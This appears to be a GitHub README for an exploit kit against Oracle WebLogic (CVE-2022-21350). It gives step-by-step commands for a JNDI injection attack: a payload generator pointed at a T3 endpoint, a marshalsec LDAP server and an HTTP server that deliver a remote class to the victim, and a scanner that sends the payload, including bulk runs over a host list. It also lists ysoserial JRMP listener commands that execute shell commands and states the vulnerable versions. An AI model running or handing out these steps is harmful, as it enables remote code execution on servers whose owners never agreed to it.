hktalent / CVE-2022-21350


Why are there two PoCs? The one containing com._51pwn.hktalent.CreatJar.main(args); is used when building the minimal payload-generation tool; once that tool has been created, use the other one.

When running CVE-2022-21350_powerBy_51pwn.jar, the error printed while building the payload does not affect the use of the payload.

Other exploits

CVE_2020_2551
CVE_2020_2555
CVE_2020_2883
CVE_2020_14645
CVE_2020_14756
CVE_2020_14825
CVE_2020_14841
CVE_2021_2394
CVE_2022_21306
CVE_2022_21350

How to use

1- generate the payload

docker run -d -p 7001:7001 -p 8453:8453 -v $PWD/setDomainEnv.sh:/home/weblogic/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/bin/setDomainEnv.sh hktalent/weblogic:12.2.1.4.0

java -cp CVE-2022-21350_powerBy_51pwn.jar com._51pwn.CVE_2022_21350.Main "t3://127.0.0.1:7001/" "ldap://docker.for.mac.localhost:1389/UpX34defineClass"

2- start the LDAP server

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer 'http://docker.for.mac.localhost:8888/#UpX34defineClass' 1389

3- start the HTTP server that serves the class file

node httpServer.js

4- send the payload

py3 ../WeblogicScan.py --tags 21350 -r -v -u http://127.0.0.1:7001
# more: scan every host listed in T3_ver.txt (first column)
cat ../T3_ver.txt|awk '{print $1}'|py3 ../WeblogicScan.py --tags 21350 -r -v -s

# JRMP listener with remote debugging enabled on port 8453 (ysuserial)
java -server -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,address=8453,server=y,suspend=n -Djava.compiler=NONE -cp ysuserial-0.9-su18-all.jar org.su18.ysuserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59"

# JRMP listener (ysoserial)
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59"

# write a serialized gadget chain to a file
java -jar ./ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "open /System/Applications/Calculator.app" >>/Users/51pwn/MyWork/TestPoc/JRMPListener.ser

Where is the payload

cat test.ser

Why is there an error message

The error printed at run time does not affect the generation of the payload, nor the effect of the payload.

How to attack

nuclei -duc -t ./network/detection/weblogic-t3-detect.yaml -l list.txt

Tool support (preconditions):

  • 1- WebLogic version:
    • 12.1.3.0.0
    • 12.2.1.3.0
    • 12.2.1.4.0
  • 2- JDK < 1.8
  • 3- Server allows OOB (out-of-band) connections

How to build / merge the jar

cd lib3
# split the jar into parts
py3 ../tools/splitTools.py -s wlfullclient_12.1.3.jar
# merge the parts back into one jar
py3 ../tools/splitTools.py -m wlfullclient_12.1.3.jar

Special thanks
